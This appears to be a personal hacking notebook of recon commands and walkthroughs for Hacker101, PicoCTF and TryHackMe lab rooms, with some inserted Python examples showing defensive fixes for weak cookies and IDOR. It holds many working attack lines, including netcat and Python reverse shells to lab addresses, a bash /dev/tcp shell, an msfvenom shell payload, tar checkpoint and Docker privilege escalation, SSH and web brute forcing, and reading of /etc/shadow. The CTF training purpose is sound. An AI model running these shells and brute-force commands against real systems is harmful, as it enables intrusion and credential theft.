🚩 A collection of notes, commands, & links to help w/ hacking & cybersec. Work in progress, please be patient while it’s updated.
CyberChef // GTFOBins // HackTricks // RevShells // PayloadsAllTheThings
🔥 Kill Chain
General
CTRL + SHIFT + UP|DOWN  # scroll
CTRL + SHIFT + C|V      # copy|paste
nl                      # cat w/ line nums
sed                     # stream editor
ip=                     # set alias env var
echo $ip                # test alias
Recon/Enumeration
rustscan
rustscan -a $ip -g
rustscan -a $ip -p $ports -- -sC -sV | tee scan.init
nmap
nmap -vv -Pn $ip
nmap -vv -Pn -p $ports -A $ip
feroxbuster
feroxbuster -u http://$ipa -w $wordlist | tee fuzz.init
FFUF
ffuf -u http://$ip/FUZZ -w $wordlist | tee fuzz.init
firefox
- Analysis: Whatruns, Wappalyzer
/robots.txt, sitemap(.xml)
smb
enum4linux $ipa | tee enum4.txt  # smb shares
Exploitation
- searchsploit ^
searchsploit -m $number $location  # Copy
searchsploit -w $term              # Website
Shells - Reverse
nc (netcat)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f
nc -e /bin/bash $ip $port
Linux Enumeration
ls -la /home
cat /etc/passwd
cat /etc/crontab
sudo -l
# run sudo with?
find / -perm -4000 2>/dev/null       # find suids
find / -user $user 2>/dev/null       # find user files
find / -name '*id_rsa*' 2>/dev/null  # find files that match id_rsa
python -c "import pty; pty.spawn('/bin/bash')"
python3 -c "import pty; pty.spawn('/bin/bash')"
/bin/sh -i
[CTRL+Z]
stty raw -echo;fg
export TERM=xterm
- pspy 🔗
Forensics
- strings
- exiftool
- binwalk
- pdfinfo
Hashes
hashid
name-that-hash (nth)
Git
git add . && git commit -m "$comment" && git push
- Generate token, use as password.
Repos
Windows
cmd.exe
dir                # list contents
cd                 # change dir
type               # cat file contents
type $file | clip  # copy to clipboard
📝 Notes
🐀 Broad Scope Bug Bounties From Scratch - XSS Rat
Bug bounty != Pentesting, it’s testing targets with skillset.
Platforms: public(Intigriti, HackerOne, Bugcrowd), private.
Target: B2B|B2C, Wide Scope|Main App, Web|Mobile|Desktop|IP|IOT, VDP|Paid, Public|Private.
- Avoid: high payout|banks (hardened), newspapers (paywall), mobile|webshops, no creds.
Invites: be active, report, ctfs (lower qual).
Subdomains:
httprobe
^ finds working http(s).
- Flyover: Aquatone,
Computing Fundamentals - Roppers Academy
Computer Science 50 Python (CS50P)
Automate The Boring Stuff with Python
✍ Writeups
- Getting started: inspect > comment
- Attack on EU: doc > “Types of Internet Banking Attacks”
- Pharming: search ^ ^ ^
- Phishing hacker: search ^
- Securing External Link: search ^
- Linux folder: search ^
💻 Hacker101
A little something to get you started
- Browser > inspect > /background.png
- Browser > inspect >
Micro-CMS v1
Postbook
Flag0
- user:password
Flag1
- My profile >
?page=profile.php&id=d  # change d to b or c
Flag2
- new post > inspect > form
<input type="hidden" name="user_id" value="$ANYTHING">
Flag3
- 189 * 5 = 945
- post > change
&id=945
Flag4
page=view.php&id=945
>page=edit.php&id=945
Flag5
- Browser > inspect > application > cookie id:$string
nth $string  # = md5
echo $string > $file
john --format=Raw-MD5 --wordlist=rockyou.txt $file
echo -n '1' | md5sum
- Browser > inspect > application > cookie id:$md5hash
Flag6
- Login > user:password
echo -n '1' | md5sum
?delete=$md5hash
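The Flag5 and Flag6 steps above work because Postbook's cookie is nothing more than md5 of the numeric user id. The Python below is an added example (not part of these notes or of the Hacker101 challenge) showing why that is weak and what the fix looks like: the weak derivation is reproducible by anyone who can count, while a random per-session nonce authenticated with an HMAC under a server-side key (SERVER_KEY is a constructed stand-in here) is neither guessable nor forgeable.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# --- the pattern Postbook uses: cookie id = md5(user_id) --------------------
def weak_session_cookie(user_id: int) -> str:
    """Derive the session cookie the way the Postbook challenge does."""
    return hashlib.md5(str(user_id).encode()).hexdigest()

def recover_user_id(cookie: str, max_id: int = 10_000) -> Optional[int]:
    """The input space is tiny, so the cookie maps straight back to a user id."""
    for uid in range(max_id + 1):
        if weak_session_cookie(uid) == cookie:
            return uid
    return None

# --- hardened: random per-session nonce, authenticated with a server key ----
SERVER_KEY = secrets.token_bytes(32)  # constructed for this example; real keys live in config

def strong_session_cookie(user_id: int, key: bytes = SERVER_KEY) -> str:
    """Cookie = user_id.nonce.tag: the nonce is unguessable, the tag makes it unforgeable."""
    nonce = secrets.token_hex(16)
    payload = f"{user_id}.{nonce}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"

def verify_session_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[int]:
    """Return the user id only if the HMAC tag is valid; None for tampered or malformed cookies."""
    parts = cookie.split(".")
    if len(parts) != 3:
        return None
    uid, nonce, tag = parts
    expected = hmac.new(key, f"{uid}.{nonce}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return int(uid) if uid.isdigit() else None

if __name__ == "__main__":
    print("weak cookie for user 1:", weak_session_cookie(1))  # same value as: echo -n '1' | md5sum
    print("recovered id:", recover_user_id(weak_session_cookie(1)))
    c = strong_session_cookie(1)
    print("strong cookie verifies as:", verify_session_cookie(c))
    forged = "2." + c.split(".", 1)[1]  # swap the id, keep the nonce and tag
    print("forged cookie verifies as:", verify_session_cookie(forged))  # None
```

The same reasoning applies to the Corridor room further down, where directory names are md5 of small integers: hashing a low-entropy value does not hide it.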
Petshop Pro
Flag0
- Burp > /checkout > Repeater > Inspector "Request Body Parameters"
- Change price of image to $0.00
Flag1 - NOT WORKING
- hydra -L $xato-net-10-million-usernames -p password $domain|ip http-post-form "/login/:username=^USER^&password=^PASS^:Invalid username" -o pass.txt -v
🗃 Kase Scenarios
🐍 Betrayal
People
Scene of the Crime
- Alarm System: Toward Kitchen P*******n O
- Computers: Office x3
- Password: ^ ^ ^ - s*ar
- Stairs: ruler > top > bottom 1*
Late Night Escape Challenges
- Google Lens > ^ > C******* C*******
- Guess > F*******
- Profile > ^ > URL:1374270*3
wget $jpg
> exiftool $jpg
> Date/Time Original > 2*:1*
- Life Insurance:
wget $zip
> open $pdf
> $*,000,000.00
- C*e and Rt
Online Troll
- YouTube > Facebook > R****
🌊 Dark Waters | Writeup Part 1, Part 2
People
- P - author of letter, hand written, “test the water”
- Lisa - young, bar owner, offered room. some event.
- Protestor - biology student @Penn State York, was watched/harassed, claims GRPC,
- William Heathcote - great-gf 1837 had issues w/ GRPC.
- GRPC - local paper co, holding event, 4 employees (Patti), hosting 100th ann,
- Alexander Ross - politician, linked to GRPC.
Location
- Glen Rock, Pennsylvania
Unknown Email: [email protected]
r/g****************e ^
Arkg sylbire: Ynxr Zneohet (ROT13)
- Next flyover: Le M***g
🚩 ******************n00bzctf 2023 | YouTube Writeup
Forensics
Crack & Crack:
Avengers ^
Misc
Sanity: /rules > inspect >
<!-- ****** -->
ASL: this + notepad
Google Form 1: inspect > CTRL + F "n00bz"
My Chemical Romance: this > 186808155710 > 18 68 08 15 57 10 > Ar Er O P La Ne > {aeroplane}
OSINT
Mission Moon
Pwn
Flag Shop: 2 > 1124151235124512 (large number)
Rev
- welcome
strings $file
- welcome
Web
Club_N00b: $site > /check?secret_phrase=radical
Robots: $site > /robots.txt
Secret Group: Burp Repeater > change headers user-agent, connection etc.
Conditions: Burp Repeater > username=ᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉ ^
🎓 PicoCTF
Cryptography
Mod 26: CyberChef (ROT13)
Mind your Ps and Qs: rsactftool ^
Forensics
information: exiftool $file, CyberChef (From Base64)
Matryoshka doll: binwalk $file, unzip cd x4, cat $file
Glory of the Garden: xxd $file *see end
Enhance!: subl $file *manually extracted
General Skills
runme.py: python $file
Serpentine: move print_flag(), python $file
First Find: wget $link, unzip $file, cat $pathToFile
Big Zip: grep -r pico $dir
Based: CyberChef
plumbing: nc $domain $port > file, cat file | grep pico
mus1c: rockstar, CyberChef (From Decimal)
flag_shop: 2,1,3578290,2,2,1
1_wanna_b3_a_r0ck5tar: remove lines
Web
GET aHEAD: Burp > Repeater, HEAD ^
Cookie:
- Burp > Repeater > name=18
- Inspect > Storage > Value 1,2,3,4,etc
Insp3ct0r: Inspect HTML, CSS & JS files for comments.
Scavenger Hunt: Insp3ct0r but robots.txt, .htaccess, & .DS_Store.
More Cookies
- Base64 cookie
where are the robots: /robots.txt
logon: Burp > proxy random login
- Cookie: username=Joe; admin=True; password=
dont-use-client-side: view source > js
It is my Birthday:
Who are you?: Burp > Repeater > Add Headers
login: view-source > /index.js (CyberChef Base64)
☁ TryHackMe | Free $5 Credit
🔐 Anonforce
Writeup: YouTube // Blog
rustscan -a $ip, 21:ftp 22:ssh
ftp $ip, anonymous
user = m*******
get user.txt
- cat ~/user.txt
get /notread/*
gpg2john private.asc > private.hash
john --wordlist=/rockyou.txt private.hash
- x******
gpg -d backup.pgp
nano root.hash
hashcat root.hash rockyou.txt
- h*****
ssh root@$ip
🏘 Attacktive Directory (AttacktiveDirect)
Writeup: YouTube
kerbrute userenum --dc THM-AD -d spookysec.local userlist.txt
🍺 Bounty Hacker
Writeup: YouTube // Blog
rustscan -a $ip -p $ports -- -sC -sV
ftp -A $ip ^
hydra -l $user -P l****.txt $ip ssh
sudo -l, tar ^
🦉 c4ptur3th3fl4g (capturetheflag)
Writeup: YouTube // Blog
- leet
- binary
- base32
- base64
- hex
- ROT13
- ROT47
- morse
- decimal
- base64 > morse > binary > ROT47 > decimal
- Audacity > spectrogram view
- steghide --extract -sf
- strings
❄ Coldbox Easy
80:http, 4512:ssh
http - wordpress - ffuf:/******/ - users:****,****,*****
msfconsole -q - setg RHOSTS - use wordpress_ghost_scanner, wordpress_xmlrpc_dos, wordpress_xmlrpc_login, wordpress_pingback_access
wpscan --url http://$ip -e vp,vt,u
wpscan --url http://$ip --passwords $wordlist
- *****:*********
- Appearance > Editor > PHP Pentest Monkey Rev Shell
# Initial Access
www-data
cat /var/www/html/wp-config.php
- DB_NAME: ******, DB_USER:*****, DB_PASSWORD:************
cat /etc/passwd
ssh c0ldd@$ip -p 4512
cat user.txt
# PrivEsc
sudo -l
sudo vim, :sh
🚪 Corridor
Writeup: YouTube // Blog
rustscan: 80,http
source: map tags w/ hash dirs > hash.txt
hashcat hash.txt /rockyou.txt
echo -n $number | md5sum
firefox: http://$ip/$md5sum
🔎 Content Discovery
Content: assets (files, vids, imgs…), features + more.
Discovery (methods): manual, automated and OSINT + combination.
Manual: /robots.txt, favicon | md5sum ^, sitemap.xml, headers (curl $ipa -v), framework stack via comments, (c) notices or credits.
OSINT: GoogleDork (site, inurl, filetype, intitle), wappalyzer, wayback, github, S3 Buckets http(s)://{name}.s3.amazonaws.com.
Automated: fuzzing (dirb, gobuster, ffuf, ferox).
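As an added example (not from these notes or from any of the tools listed above), the Python below shows what the manual checks read off a site: it parses a constructed robots.txt for the paths the owner asked crawlers to skip (the first thing a discovery scan tries) and computes the favicon MD5 that is matched against published framework fingerprints. A defender can run the same two checks against their own site to see what it gives away; the sample robots.txt and favicon bytes are constructed for the example.

```python
import hashlib
from typing import Dict, List

# Constructed sample robots.txt; not taken from any real site.
SAMPLE_ROBOTS = """\
# internal tooling, keep out of search results
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/
Sitemap: https://example.test/sitemap.xml

User-agent: Googlebot
Disallow: /staging/
"""

def parse_robots(text: str) -> Dict[str, List[str]]:
    """Collect every Disallow/Allow/Sitemap value across all User-agent groups.

    Comments (after '#') and blank lines are ignored; duplicates are dropped
    but first-seen order is kept so the output is stable.
    """
    found: Dict[str, List[str]] = {"disallow": [], "allow": [], "sitemap": []}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key in found and value and value not in found[key]:
            found[key].append(value)
    return found

def paths_to_review(robots: Dict[str, List[str]]) -> List[str]:
    """Disallowed paths are hints, not protection: each one needs real auth behind it."""
    return [p for p in robots["disallow"] if p != "/"]

def favicon_fingerprint(data: bytes) -> str:
    """MD5 of the favicon bytes, the same value `md5sum favicon.ico` prints."""
    return hashlib.md5(data).hexdigest()

# Constructed favicon bytes (an ICO header followed by filler), not a real icon.
SAMPLE_FAVICON = b"\x00\x00\x01\x00" + b"constructed-favicon-bytes"

if __name__ == "__main__":
    robots = parse_robots(SAMPLE_ROBOTS)
    print("robots.txt reveals:", robots)
    print("paths needing access control:", paths_to_review(robots))
    print("favicon fingerprint:", favicon_fingerprint(SAMPLE_FAVICON))
```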
🛋 Couch
Writeup: YouTube (Coming Soon)
rustscan
Research ^
ssh user:password
cat .bash_history
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/root/root.txt
🚩 CTF Collection Volume 1 (ctfcollectionvol1)
Writeup: YouTube // Blog (Coming Soon)
- CyberChef > base64
strings $file or exiftool
steghide --extract -sf $file
- Inspect (CTRL + SHIFT + C)
zbarimg $file ^
strings $file
- CyberChef > Base58
- CyberChef > ROT13 > ROT7
- Inspect (CTRL + SHIFT + C)
xxd -p $file > $newFile
nano $newFile, replace 2333445f w/ 89504E47 ^
- CyberChef > Upload $newFile > From Hex > Render Image
- Google Dork
site:"reddit.com" intext:"THM" intitle:"tryhackme"
nano $file, beef $file
- XOR Calculator > ASCII (base 256)
binwalk $file, unzip $file
- stegsolve
zbarimg $file, https://sclouddownloader.net/
- Wayback
- Decode > Automatic > Key = THM
- Dec > Hex > ASCii
- wireshark > filter http.request.method == "GET" > Follow HTTP Stream
🕺 Dav
Writeups: Twitter // YouTube // Blog (Coming Soon)
rustscan
- 80
- Apache/2.4.18
feroxbuster
- /webdav
Try: Burpsuite - bruteforce basic http auth
Search - webdav default credentials ^
- w*****:x*****
hashid $hash
Try: MD5(APR) or Apache MD5 ^
hashcat -m 1600 hash.txt $rockyou.txt
cadaver http://$ip/webdav ^
- revshell = shell.php
put shell.php
nc -lnvp $port
http://$ip/webdav/shell.php
Upgrade Shell
python3 -c "import pty; pty.spawn('/bin/bash')"
[CTRL+Z]
stty raw -echo;fg
export TERM=xterm
PrivEsc ^
sudo -l = /bin/cat
cat /etc/shadow
cat /root/root.txt
🥜 Easy Peasy
Writeup: YouTube // Blog
rustscan: 80:http, 6498:ssh, 65524:http
feroxbuster: 80, /hidden/whatever, view-source:base64
65524:viewsource search “flag”
65524/robots.txt ^, view-source:Base62 = $directory
- hashcat -m 6900 $hash $dict
- steghide --extract -sf $img, cat $file.txt, binary cyberchef
- ssh b*****@$ip -p 6498
cat crontab, nano $file > revshell ^, cat $.root.txt
🎮 Gaming Server
Writeup: YouTube // Blog
rustscan -a $ip, 22:ssh, 80:http
feroxbuster: /u*****s/, /s****t/
user = j***, pw = dict.lst
ssh2john $key > $hash, john $hash dict.lst
l*****n, chmod 600 $key
wget ^, chmod +x $file,
python -m http.server 80
bash build-alpine
mv /mnt/root
🔥 Ignite
Writeup: YouTube // Blog
rustscan
80
- a****:a****
searchsploit Fuel
searchsploit -m 50477
RevShell
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.1.107 4242 >/tmp/f
Upgrade Shell
python3 -c "import pty; pty.spawn('/bin/bash')"
[CTRL+Z]
stty raw -echo;fg
export TERM=xterm
cat /fuel/application/config/database.php
su root
🔎 Investigating Windows
Writeup: YouTube // Blog
RDP via Remmina
- cmd >
systeminfo
Get-LocalUser | Select Name,LastLogon
- regedit > HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run
- Computer Management > Groups > Administrator
- Event Viewer > Event ID 4634 'Log off'
- Alternative:
net user John
- Alternative:
- C:\TMP
- C:\Windows\System32\drivers\etc
- C:\inetpub\wwwroot
- Firewall > Inbound Rules > 1337
- cmd >
📚 Library
Writeup: YouTube // Blog
rustscan: 22,80=Apache2.4.18
robots.txt
Users - m*******
hydra SSH bruteforce ^
hydra -l m******* -P $rockyou $ip ssh -t 4 -vv
- i********
rm bak.py
nano bak.up
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
🏹 Lian Yu
Writeup: YouTube // Blog
rustscan: ftp, ssh, http
feroxbuster x3 big.txt dir-medium.txt
- /island/2100/green_arrow.ticket
- B***58
ftp > mget *
- hexedit $broken.png, fix magic header ^
- stegseek $jpg
ssh $s***e $shado
- sudo -l ^
- sudo pkexec /bin/sh
🎩 Madness
Writeup: YouTube // Blog
rustscan: 22,80
http: view source
- wget $jpg
hexedit $jpg, magic number ^
- http://$ip/$directory?$variable=$number
Burp: intruder, payload 0-99
steghide --extract -sf $image
find / -perm -4000 2>/dev/null
📃 MD2PDF
Writeup: YouTube // Blog
rustscan: 5000
gobuster -w /seclists/common.txt = /admin
🎭 Mr Robot (WIP)
Writeup: YouTube // Blog
- rustscan: 80, 443
/robots.txt: $dic
ferox -kE -x js php html css etc.
- /wp-login.php
- wpscan --disable-tls-checks
- hydra ^
🏡 Neighbour
Writeup: YouTube // Blog
firefox:
- http://$ip,
CTRL+U
guest:guest - http://$ip/profile.php?user=admin
- http://$ip,
🐱👤 Ninja Skills
Writeup: YouTube // Blog
find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>/dev/null
🔓 Overpass
Writeup: YouTube // Blog
l****.js > Cookie: SessionToken=statusOrCookie > firefox add cookie
- ssh2john key > hash
- john hash rockyou.txt
- passphrase:j*****3
- ls .o******* > ROT47 ^
- [{"name":"S*****","pass":"s*******************e"}]
cat /etc/crontab
- nano /etc/hosts > add $localip
- Add revshell to crontab/$file, locally > nc
🥒 Pickle Rick
Writeup: YouTube // Blog
rustscan -a $ip
feroxbuster -x js php html css etc.
- index source: user
- robots.txt: pw
/l****.php
- while read line; do echo $line; done < $file ^
- ls -la /home/
- sudo -l
- sudo cp /root/$file .
👨💻 RootMe
Writeup: YouTube // Blog
rustscan -a $ip -p $ports -- -sC -sV
feroxbuster -x js php
- u*******
- p****
Burp > Intruder FUZZ >
.php*
^SUID ^ -
find / -perm /4000
python -c 'print(open("/****/****.txt").read())' ^
🔴 Res
Research: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis) [^](https://redis.io/docs/data-types/), Webshell [^](https://redis.io/docs/data-types/)
redis-cli -h $ip
msfconsole -q
search redis
use scanner/redis/file_upload
- set LocalFile $shell
- set RemoteFile /var/www/html/
linpeas: xxd, GTFO Bins [^](https://gtfobins.github.io/gtfobins/xxd/)
- cat /etc/passwd
- copy hash > $file
🤖 Skynet
rust: 22,80,445...
enum4linux: //$ip/anonymous | m*********n
ffuf: /s**********l
hydra -l m*********n -P l**1.txt $ip http-post-form "/s**********lsrc/login.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect." -vV -t 1
smb - m*********n:)**************`
- notes/i********t.txt
http://$ip/4**************d
- ffuf=/a***********r
searchsploit -m 2***1
- /alerts/alertConfigField.php?urlConfig=../../../../../../../../../home/m*********n/user.txt
- /alerts/alertConfigField.php?urlConfig=http://$ip/shell.php?
cat /etc/crontab
- /home/m*********n/backups/backup.sh
- echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.38.220 3333 >/tmp/f' > shell.sh
- touch --checkpoint-action=exec=sh shell.sh
- touch "/var/www/html/--checkpoint=1"
🌶 Startup
21,22,80
M*** /f****
ftp=Anonymous Login
shell.php ^ /files/ftp
cat /recpie.txt
get s********.pcap
l*****:c*****************
ssh@l*****
cat user.txt
cd scripts
echo '$shell.sh' > /etc/print.sh
nc -lvnp $port
🐱 Thompson
Writeup: YouTube // Blog
rustscan
- 8009
- 8080
feroxbuster
/host-manager/
/manager/
t*****:s*****
Upload RevShell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=$port -f war > reverse.war
strings reverse.war | grep jsp  # in order to get the name of the file
Upgrade Shell
python3 -c "import pty; pty.spawn('/bin/bash')"
[CTRL+Z]
stty raw -echo;fg
export TERM=xterm
/home/j***/id.sh
nano id.sh
bash -i >& /dev/tcp/$ip/$port 0>&1
🌐 Web Application Security
Writeup: YouTube (Coming Soon)
Web app: app w/out install on remote server e.g. gmail, office on., etsy.
Identification/Auth Fail: bruteforce attack, weak|clear-text passwords.
Broken Acc. Control: not least priv (IDOR), mod other users' data, access other pages without auth.
Injection: input w/ malicious code to trick app.
Crypt Fail: HTTP != HTTPS, weak crypt e.g. ROT13, default keys e.g. 1234.
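Added example (not from these notes): a minimal Python model of the broken access control bullet above, which is also the bug behind the Postbook id-swapping flags (changing `id=` or the hidden `user_id` field). The first handler trusts the id from the request; the second checks that the post belongs to the session user and returns the same Forbidden response whether the post is someone else's or does not exist, so ids cannot be enumerated from the error. Post, POSTS, Forbidden and the handler names are assumptions made for the example.

```python
from dataclasses import dataclass
from typing import Dict

@dataclass
class Post:
    id: int
    owner: str
    body: str

# Constructed data store standing in for the application's database.
POSTS: Dict[int, Post] = {
    1: Post(1, "alice", "alice's private note"),
    2: Post(2, "bob", "bob's private note"),
}

class Forbidden(Exception):
    """Raised for any request the session user may not fulfil."""

def view_post_idor(post_id: int) -> str:
    """Vulnerable: the id in the request is the only thing deciding what is returned."""
    return POSTS[post_id].body

def _owned_post(session_user: str, post_id: int) -> Post:
    """Authorization check shared by every handler; missing and foreign posts look identical."""
    post = POSTS.get(post_id)
    if post is None or post.owner != session_user:
        raise Forbidden("post not available")
    return post

def view_post(session_user: str, post_id: int) -> str:
    """Hardened read: the session, not the request, decides whose data is visible."""
    return _owned_post(session_user, post_id).body

def edit_post(session_user: str, post_id: int, new_body: str) -> str:
    """Writes go through the same check, so a hidden user_id field cannot redirect the edit."""
    post = _owned_post(session_user, post_id)
    post.body = new_body
    return post.body

def is_forbidden(session_user: str, post_id: int) -> bool:
    """True when the checked handler refuses the request (used by the demo and tests)."""
    try:
        view_post(session_user, post_id)
    except Forbidden:
        return True
    return False

if __name__ == "__main__":
    print(view_post_idor(2))           # any caller gets bob's note
    print(view_post("alice", 1))       # alice gets her own note
    print(is_forbidden("alice", 2))    # True: bob's note refused
    print(is_forbidden("alice", 999))  # True: same answer for a missing id
```

The fix is not input validation on the id (a well-formed id is still the wrong user's) but an ownership or role check on every handler that touches the object.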
🐱🐉 WGEL
Writeup: YouTube // Blog
rustscan: 22 ssh, 80 http
firefox: http://$ip, view source
gobuster: /sitemap/, /sitemap/.ssh
ssh j****e:key, chmod 600 key
sudo -l, /usr/bin/wget
- local: python -m http.server, remote: wget http://$ip/linpeas.sh
- chmod +x linpeas.sh
- gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
🐇 Year Of The Rabbit
Writeup: YouTube // Blog
rustscan -a $ip -p $ports -- -sC -sV
feroxbuster
/a****s/ > css comment
burp > repeater > header
/W*********U
wget $png > binwalk > binwalk -e | strings $png
copy/paste passwords >
hydra -l f****** -P $file $ip ftp
ftp -A $ip > get $file.txt > beef $file.txt
find / -name s3cr3t 2>/dev/null, su g*********e
sudo -u#-1 /usr/bin/vi /home/g*********e/user.txt